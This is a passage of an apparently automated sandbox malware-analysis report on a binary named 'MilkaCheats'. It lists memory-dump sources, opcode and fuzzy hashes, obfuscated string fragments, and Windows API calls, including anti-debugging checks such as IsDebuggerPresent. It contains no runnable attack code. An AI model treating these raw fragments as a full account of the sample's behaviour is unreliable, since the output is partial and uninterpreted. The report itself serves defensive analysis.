                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $7$7$8$W
                                                                                              • API String ID: 0-4210289531
                                                                                              • Opcode ID: b84917e3046d0e9ff34ea9dff3210f059944da5bea755bfecf8ed8586c0b4526
                                                                                              • Instruction ID: 37e1f35e59c946589e3f8a617d325cb3eefb805ec8a87b0b81449efb60961ddb
                                                                                              • Opcode Fuzzy Hash: b84917e3046d0e9ff34ea9dff3210f059944da5bea755bfecf8ed8586c0b4526
                                                                                              • Instruction Fuzzy Hash: 9081C57260C7808BD328CA3DC85539BBBD2ABD5328F1D8A2DE5E5873D2D7788845C742
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 3213747228-0
                                                                                              • Opcode ID: 377daaca5f40ff0bab8c76c66dec3116f3cd0f311fe1383518dd9434e06cd4a3
                                                                                              • Instruction ID: 3eaedc38190d0fdc2f9bbedb7d08626f8941205fb8e7e3627f47a0380c302d83
                                                                                              • Opcode Fuzzy Hash: 377daaca5f40ff0bab8c76c66dec3116f3cd0f311fe1383518dd9434e06cd4a3
                                                                                              • Instruction Fuzzy Hash: 44B10272A003459FEB258F68C891BFEBBE5EF55314F18816BE845AB342DA349D01C7B1
                                                                                              APIs
                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 000DB329
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 000DB41D
                                                                                              • FindClose.KERNEL32(00000000), ref: 000DB45C
                                                                                              • FindClose.KERNEL32(00000000), ref: 000DB48F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 1164774033-0
                                                                                              • Opcode ID: ca17a6c517a96d0795f690f0f44bd832864b2c3515e43ede4314953752c1c877
                                                                                              • Instruction ID: dc820255847f1e01925d35832b7b6a94106dc711285bb5cbd44433719ed4a6e2
                                                                                              • Opcode Fuzzy Hash: ca17a6c517a96d0795f690f0f44bd832864b2c3515e43ede4314953752c1c877
                                                                                              • Instruction Fuzzy Hash: FA71C4759053689EDF60EF648C89AFEB7B9AF05304F1541DAE448A7312DB358EC49F20
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 000C778B
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 000C7857
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000C7870
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 000C787A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: ad6c37f4942485ad8a7463fd3be0afcfb481515de777c3c6b03cbe76614946ba
                                                                                              • Instruction ID: 7098c7b6664491901188d75b757daa66a064b4781595bd9d9688a54ba1e5279c
                                                                                              • Opcode Fuzzy Hash: ad6c37f4942485ad8a7463fd3be0afcfb481515de777c3c6b03cbe76614946ba
                                                                                              • Instruction Fuzzy Hash: 6731F775D052189BDF60EFA4D989BCDBBB8BF08700F1041AAE50CAB250EB759A85CF45
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: lcw|<a$o~{q$w|<a${{up
                                                                                              • API String ID: 0-3972657743
                                                                                              • Opcode ID: ee1d4c4be59772c9dc4ba5ef2cc83ec8845917b8600013c03d7c0a4548024979
                                                                                              • Instruction ID: 05e46a85f6f71d5bac69d3b7b7b182a6825350390a5d4fc126ec06cd51a07652
                                                                                              • Opcode Fuzzy Hash: ee1d4c4be59772c9dc4ba5ef2cc83ec8845917b8600013c03d7c0a4548024979
                                                                                              • Instruction Fuzzy Hash: ABA17A716047428FE7298F64C8807A2FBE2FF65314F28866DD8A60B7D2D335E846C791
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 3768$:?-)$i7b0$~x||
                                                                                              • API String ID: 0-4241966085
                                                                                              • Opcode ID: 5710efa4951a73522a1cd609604e5c6ba47521d46e43b5ec33226a688e5db37e
                                                                                              • Instruction ID: f1a86c42a3739d65a2815bc074c23511cca905313e54b739e296ac7ec952e331
                                                                                              • Opcode Fuzzy Hash: 5710efa4951a73522a1cd609604e5c6ba47521d46e43b5ec33226a688e5db37e
                                                                                              • Instruction Fuzzy Hash: 822178B460D3808BD3648F29949025BBFE2ABD2324F644A2DF0E14B394D3798486CF07
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000DDFA8
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000DDFF2
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000DE0B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 661929714-0
                                                                                              • Opcode ID: f1fdc1bd936ddaa8de4a38de7db1f1d7ce3f4854a81bf81d83ce231182c28ba2
                                                                                              • Instruction ID: 46538fe474f9652df572cb245f90a0ccebcba77ec9ac9794bd6915362ce634e6
                                                                                              • Opcode Fuzzy Hash: f1fdc1bd936ddaa8de4a38de7db1f1d7ce3f4854a81bf81d83ce231182c28ba2
                                                                                              • Instruction Fuzzy Hash: 4761A375A10347AFEB64AF24CC82BBA77E8EF04300F14417AE915CA385E774E995CB60
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 000CB5EB
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 000CB5F5
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 000CB602
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 4fafd887d82510f826443e65c1f7c70a03995d1419e714cc0c077d1657b2d84c
                                                                                              • Instruction ID: 3b40cfa9f2b610c07a7b626e4d1422f3a5c26505efad7e3c875d138824c2a744
                                                                                              • Opcode Fuzzy Hash: 4fafd887d82510f826443e65c1f7c70a03995d1419e714cc0c077d1657b2d84c
                                                                                              • Instruction Fuzzy Hash: D931C5759012289BCB61DF68DD89BCCBBB8BF08710F5041EAE50CA7251EB749F858F45
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: %*+($InA>$P
                                                                                              • API String ID: 0-1283304554
                                                                                              • Opcode ID: 69c79a69b68684340418c6de6c15f7cefbd510847b5e62cf76ade11209e71bc7
                                                                                              • Instruction ID: d56f0d100e75be20df71cd939511cc4fb01e54f0c720f5c513da00c335289c75
                                                                                              • Opcode Fuzzy Hash: 69c79a69b68684340418c6de6c15f7cefbd510847b5e62cf76ade11209e71bc7
                                                                                              • Instruction Fuzzy Hash: 8EE107725083648FD325CF28985076FBBE1EBC5714F158A2CE9A99B391CB74D906CBC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -$gfff$gfff
                                                                                              • API String ID: 0-837351935
                                                                                              • Opcode ID: d4127b2774f59aa8715d81dbccfbb22cbe20e6c1cd757104035fa32d46f19a6e
                                                                                              • Instruction ID: 62ff869091370c397b4fb060e81e1f8ab08820eb4742a2230df92582868f1c4e
                                                                                              • Opcode Fuzzy Hash: d4127b2774f59aa8715d81dbccfbb22cbe20e6c1cd757104035fa32d46f19a6e
                                                                                              • Instruction Fuzzy Hash: 94E1C07160C3968FC715CF29C48026AFFE1AFD9304F088A6DE9D997392D234D949DB52
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "MO$40,G$L]IN
                                                                                              • API String ID: 0-2812748645
                                                                                              • Opcode ID: 4f1db071aef4295662c013afa0dc9ca3fed0ae4f3ff53a7c54eade7df3650f13
                                                                                              • Instruction ID: 357b751a5244f858f420f21ee8c5388745614c9477c0208beaab716827a066ef
                                                                                              • Opcode Fuzzy Hash: 4f1db071aef4295662c013afa0dc9ca3fed0ae4f3ff53a7c54eade7df3650f13
                                                                                              • Instruction Fuzzy Hash: E4A104705047818BD329CF29C490762BBE2BF96314F288AADD4E68BB56C375E846CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: DE$[Y$j
                                                                                              • API String ID: 0-2398809664
                                                                                              • Opcode ID: 3195f798ee7a60e65a6da30117195d18f93f3a46813107e3d2f9de05ccdc6560
                                                                                              • Instruction ID: f466fb6de07c5baf61ccd92a4898a56a9fb37119da90d3c8fb6c7b80e948e3d0
                                                                                              • Opcode Fuzzy Hash: 3195f798ee7a60e65a6da30117195d18f93f3a46813107e3d2f9de05ccdc6560
                                                                                              • Instruction Fuzzy Hash: A791CDB651D3508BC314CF25C89125BBBE2FFD5318F19892CE4D84B791E3B58909CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "MO$40,G$L]IN
                                                                                              • API String ID: 0-2812748645
                                                                                              • Opcode ID: 247fc5e750414c71ecc7bf8a2d624936bbbcfbf24d0cf7726668f12528fce844
                                                                                              • Instruction ID: b48714b760911ec2a50eb0053472aa7024cea6f458267a8f853865e3de123e73
                                                                                              • Opcode Fuzzy Hash: 247fc5e750414c71ecc7bf8a2d624936bbbcfbf24d0cf7726668f12528fce844
                                                                                              • Instruction Fuzzy Hash: 4B8104B15047818FD325CF2AC490762BBE2BF96304F2885ADD4EA4F746C3759447CBA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "MO$40,G$L]IN
                                                                                              • API String ID: 0-2812748645
                                                                                              • Opcode ID: ec70a32ffddd1b3cb99e7deab79c47f689cc4c32e37e9b6c9503c84adadaa294
                                                                                              • Instruction ID: 7fb804796739e409c2011b26963aba020c9d35702a273410cf5f9ad5b70b7c7c
                                                                                              • Opcode Fuzzy Hash: ec70a32ffddd1b3cb99e7deab79c47f689cc4c32e37e9b6c9503c84adadaa294
                                                                                              • Instruction Fuzzy Hash: D881F3B15047818FD325CF2AC490762BBE2BF96304F2886ADD4E64F756C379A447CBA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Ehrd$n|of$txLL
                                                                                              • API String ID: 0-1271805156
                                                                                              • Opcode ID: 5fd7a7faba47377d064207015be6ba4ced17ca23ba9f116e194c90821bd06350
                                                                                              • Instruction ID: 2eafb8f9f217e2a20e298c7bccfc05103bd522bee07e6f155cb56ada1f2e78e3
                                                                                              • Opcode Fuzzy Hash: 5fd7a7faba47377d064207015be6ba4ced17ca23ba9f116e194c90821bd06350
                                                                                              • Instruction Fuzzy Hash: 2D31BF7410C3848FD3508F1596E266FBFE1EB82B50F28096CE0D69B711C339CA0A9F96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 276b97fbd984da2656be2fafbcceb2476177e29d667066f5566847cfd156f8c7
                                                                                              • Instruction ID: 62dd5e5e0b48d7808f7f0ac974c389bdf67b7794094eeb393178b94719b4fccf
                                                                                              • Opcode Fuzzy Hash: 276b97fbd984da2656be2fafbcceb2476177e29d667066f5566847cfd156f8c7
                                                                                              • Instruction Fuzzy Hash: CBF12C71E012199FDF14CF69D880BAEB7F1FF88314F15826AE819AB381D731A9458F94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $96w$c]
                                                                                              • API String ID: 0-247510824
                                                                                              • Opcode ID: de7722bf3c73c5b83954ba33a282ced62fba462950f44f3f88abc5f38a6182ab
                                                                                              • Instruction ID: 06e3f9c68ac5a955f60a19fb18d6ad5edb05c2f56d617e9596b43b46188f232c
                                                                                              • Opcode Fuzzy Hash: de7722bf3c73c5b83954ba33a282ced62fba462950f44f3f88abc5f38a6182ab
                                                                                              • Instruction Fuzzy Hash: 5B22C0756083419BD728CF24D881BAFB7E2EBD8714F15893CF68987291D771E881CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `$c
                                                                                              • API String ID: 0-1220095849
                                                                                              • Opcode ID: 5c608a1e2e721dabdcaeeddb8a4bb7f1cc7d9f0b7b683d9c8b8af8142caded02
                                                                                              • Instruction ID: d6df85fbac8cfff1b2b33659c9d4e842e9160eb7cfdd4ade90b64e15b2356aee
